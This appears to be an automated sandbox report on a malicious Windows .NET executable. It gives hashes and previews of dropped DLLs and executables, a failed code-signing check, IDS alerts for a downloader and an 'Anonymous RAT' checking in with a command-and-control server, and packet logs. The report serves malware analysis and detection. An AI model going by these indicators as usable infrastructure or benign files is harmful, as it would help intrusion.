                                                                                              Category:dropped
                                                                                              Size (bytes):244397152
                                                                                              Entropy (8bit):0.005451982949466598
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:8jPqt44MQyK3g/QsenSOOWdlzLfNVMaR7HxDGc9s7zUx:8jPk44M3K3gLKnLfNVMaRJGcu
                                                                                              MD5:EC97E838E8FDA95207C2E2D8BCCCA820
                                                                                              SHA1:B4510AA0F4A24125E2EC9C95FD3C144EFD10B8D0
                                                                                              SHA-256:0627D4A54BD14AEDA0C116723CAB0FBAB59A06096CB250EEA320EEC984A36592
                                                                                              SHA-512:0301EA4FAFB2060073C3008D25B682437FFF29250A46AA85687A580851787D5924AF824BF0A066E47B9F5370006EE63CAAB2D4F9CB68FAB7E11CC34EB28DFF57
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lo..............u......x......x......x......u......u......u.............x......u.......x.......x.......x.......x......Rich....................PE..d....Tg.........." .....|...h......\{.......................................0............`.............................................."..p..........................`R... ..T.......8...............................8............................................text...z{.......|.................. ..`.rdata...Q.......R..................@..@.data...H...........................@....pdata.............................@..@.rsrc..............................@..@.reloc..T.... ......................@..B........................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):49744
                                                                                              Entropy (8bit):6.675573056871668
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:EB49C1D33B41EB49DFED58AAFA9B9A8F
                                                                                              SHA1:61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
                                                                                              SHA-256:6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
                                                                                              SHA-512:D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....=..........." ...&.<...8.......B....................................................`A........................................Pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):376421
                                                                                              Entropy (8bit):7.989777916441178
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:1E17E3F8B9917CE02CDB53F289DB96C9
                                                                                              SHA1:0B40A61EF4B5D1DBFD437896D1881A0EE5A457D9
                                                                                              SHA-256:D98A28F66F6B168164DB2C62AC1AD62F0316D52BBBEB7F8787300E429319E6B1
                                                                                              SHA-512:2DD8AC7914289056413927208B7451F5212DB598D8F6F91190CB7844BE1A937C239DAA9F8E9B91869D724527F20CAC04BD414AD28C0155F1B9D6200B91EDC881
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah*........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!.*.p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<..*...Ls%..g.\.C.i~,.|Uh.VTq.1F.7..{-.6..-.....I....Z.*..%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2659840
                                                                                              Entropy (8bit):6.694083259050332
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:44AD77338A945FE1451861B59267A68D
                                                                                              SHA1:F555C3A9AC9BBD5859D1958A844FCDD5E5106339
                                                                                              SHA-256:B0D418E149890608CF0BB3DCC7EA23F5AD645F5F598D62143FE3136692FA0962
                                                                                              SHA-512:CD02A0354E6B64BC21EC68DF966DA96B09BDC745A0F39B5CE7E3ED6051A2E909BD87E631830E8348F15539B4412A86AF12DAB928B0F19F2C44615E04344F9D77
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........1..._..._..._...Z..._.e....._...\..._...Z.._...[..._...^..._...[..._.).Z..._......_.l.Z.._....._...^.._.i.Z.._.i._..._.i..._.i.]..._.Rich.._.........................PE..d.....Y..........".................h<.........@..............................(...........`...|.......................................%.X...X.%.T.....(......P'...............(..A.. .!.T.....................!.(.....!.................x............................text...<........................... ..`.rdata..6m.......n..................@..@.data...H6....&..,....&.............@....pdata.......P'.. ....'.............@..@.gfids..@....p(......N(.............@..@.tls..........(......P(.............@....rsrc.........(......R(.............@..@.reloc...A....(..B...T(.............@..B................................................................................................................
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.42158171301493
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:56BEEB255FF732124CB1D77FF702E33F
                                                                                              SHA1:B693A55871358056EDBC1497F2D909046E5DEF14
                                                                                              SHA-256:7932E777419E4BACE30549B9EFCCCF3B715C7C2764908F6907F3B627B5DDD2A5
                                                                                              SHA-512:8471F731C7FAAC2CA1B1EC34935C1616DE79DFEAE1B8C95DF920C49C61CCA8CD01A3A2CF71BC8496AE4E34B432FCBD5D92B30B11C00D2F0137052077D4B39470
                                                                                              Malicious:false
                                                                                              Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm../?EQ..............................................................................................................................................................................................................................................................................................................................................iu8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):6.1684566046977185
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:VJQyKuHEUe.exe
                                                                                              File size:185'744 bytes
                                                                                              MD5:703274fa7a3febb125ce7ea741a2d546
                                                                                              SHA1:557e4513056574074cb1a4070842561519136ec9
                                                                                              SHA256:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0
                                                                                              SHA512:bf983255c07b375545f5cbff83ebf6f44dd5a9fdcc45b31305fbdda4e2e5da10b207502122464eaeb5f0d0884cf5df36dcd548a169beedf2caa9a9d36cf752fe
                                                                                              SSDEEP:3072:+743otv7KWtY9eVd0YprmmojWDzGIVa8OSVsg5ujtp32y4mUq9tDdUW5:+E4B+WOU70YNvoiDKmsZtN2yJUwdUW5
                                                                                              TLSH:95047B27F2A44077E16A86359813CA254771BC1087609BEF13D8B61B9F337C16E39B7A
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........."...0..F...r.......e... ........@.. ....................... ......9.....`................................
                                                                                              Icon Hash:2d2e3797b32b2b99
                                                                                              Entrypoint:0x42651e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xD177A4E7 [Mon May 12 12:39:03 2081 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                              Error Number:-2146869232
                                                                                              Not Before, Not After
                                                                                              • 24/05/2021 20:00:00 28/05/2024 19:59:59
                                                                                              Subject Chain
                                                                                              • CN=Chengdu Qilu Technology Co. Ltd., O=Chengdu Qilu Technology Co. Ltd., L=\u6210\u90fd\u5e02, S=\u56db\u5ddd\u7701, C=CN
                                                                                              Version:3
                                                                                              Thumbprint MD5:187A069F86D379FE84D71BA37D3B2A30
                                                                                              Thumbprint SHA-1:4D7326B46527C9CBEEC83D4368EAF372300FFDCC
                                                                                              Thumbprint SHA-256:A2F571D518EAEF0A67CCC12AD3AAC3F240AA8B39A679E5A2F352700412306CAA
                                                                                              Serial:05DE6C1E6DCB34DF9869AEDC157F0725
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x264ca0x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x6e99.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x2ba000x1b90.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x300000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x264200x38.text
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x245240x24600c3782d8cf06bc31d8e9a1926fee3dbd0False0.5141215635738832data6.220523704368287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x280000x6e990x7000615dc3cc202532bceedd01393dff50abFalse0.177978515625data4.542306852421802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x300000xc0x20058f52b132646d788c802f87fabf5007cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x282380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.21321961620469082
                                                                                              RT_ICON0x290e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.3953068592057762
                                                                                              RT_ICON0x299880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.4479768786127168
                                                                                              RT_ICON0x29ef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.09948132780082987
                                                                                              RT_ICON0x2c4980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.12593808630393996
                                                                                              RT_ICON0x2d5400x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.19680851063829788
                                                                                              RT_GROUP_ICON0x2d9a80x5adata0.7
                                                                                              RT_VERSION0x2da040x24cdataChineseChina0.5153061224489796
                                                                                              RT_MANIFEST0x2dc500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                              RT_MANIFEST0x2de3c0x105dexported SGML document, ASCII textEnglishUnited States0.2174743375507281
                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              ChineseChina
                                                                                              EnglishUnited States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-18T13:05:50.566344+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497143.5.237.31443TCP
                                                                                              2024-12-18T13:05:54.492005+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497153.5.238.183443TCP
                                                                                              2024-12-18T13:05:58.604327+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497223.5.238.183443TCP
                                                                                              2024-12-18T13:06:01.843523+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497313.5.239.146443TCP
                                                                                              2024-12-18T13:06:04.720219+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.5497433.5.239.146443TCP
                                                                                              2024-12-18T13:06:09.012883+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54974952.95.161.33443TCP
                                                                                              2024-12-18T13:06:30.366027+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54979427.50.63.84433TCP
                                                                                              2024-12-18T13:07:44.715735+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.54979427.50.63.84433TCP
                                                                                              2024-12-18T13:08:49.924265+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.55001227.50.63.84433TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 13:05:40.470190048 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:40.470235109 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:40.470320940 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:40.632169008 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:40.632205009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:42.508045912 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:42.508171082 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:42.511037111 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:42.511045933 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:42.511317968 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:42.565515995 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:42.571052074 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:42.615339994 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.314440966 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.362492085 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.366080046 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366096973 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366139889 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366153955 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366170883 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366183043 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.366204977 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.366235971 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.366267920 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.560538054 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.560555935 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.560592890 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.560622931 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.560642958 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.560676098 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.560686111 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.560693979 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.610166073 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.610191107 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.610419035 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.610419035 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.610439062 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.617119074 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.617208004 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.617222071 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.659518957 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.721534967 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.721549034 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.721600056 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.721636057 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.721642971 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.721894026 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.721921921 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.722065926 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.788794994 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.788810968 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.788839102 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.788892031 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.788922071 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.788939953 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.788974047 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.791738987 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.811336994 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.811368942 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.811467886 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.811486959 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.811526060 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.862497091 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.862529993 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899739981 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899813890 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899822950 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899904966 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.899909973 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899945021 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.899959087 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.899959087 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920715094 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920758009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920764923 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920813084 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920838118 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920852900 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920860052 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920900106 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.920909882 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.920969009 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.942065001 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942091942 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942198038 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.942224026 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.942352057 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.944983006 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984819889 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984827042 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:43.984973907 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:43.985003948 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005016088 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005028009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005067110 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005078077 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005155087 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.005203009 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.005223989 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040209055 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040255070 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040261984 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040323019 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040369987 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040376902 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.040393114 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.040442944 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055200100 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055210114 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055239916 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055330992 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055331945 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055366993 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.055383921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.055383921 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.091948986 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.091969967 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:44.092135906 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:44.092185974 CET443497103.5.237.31192.168.2.5
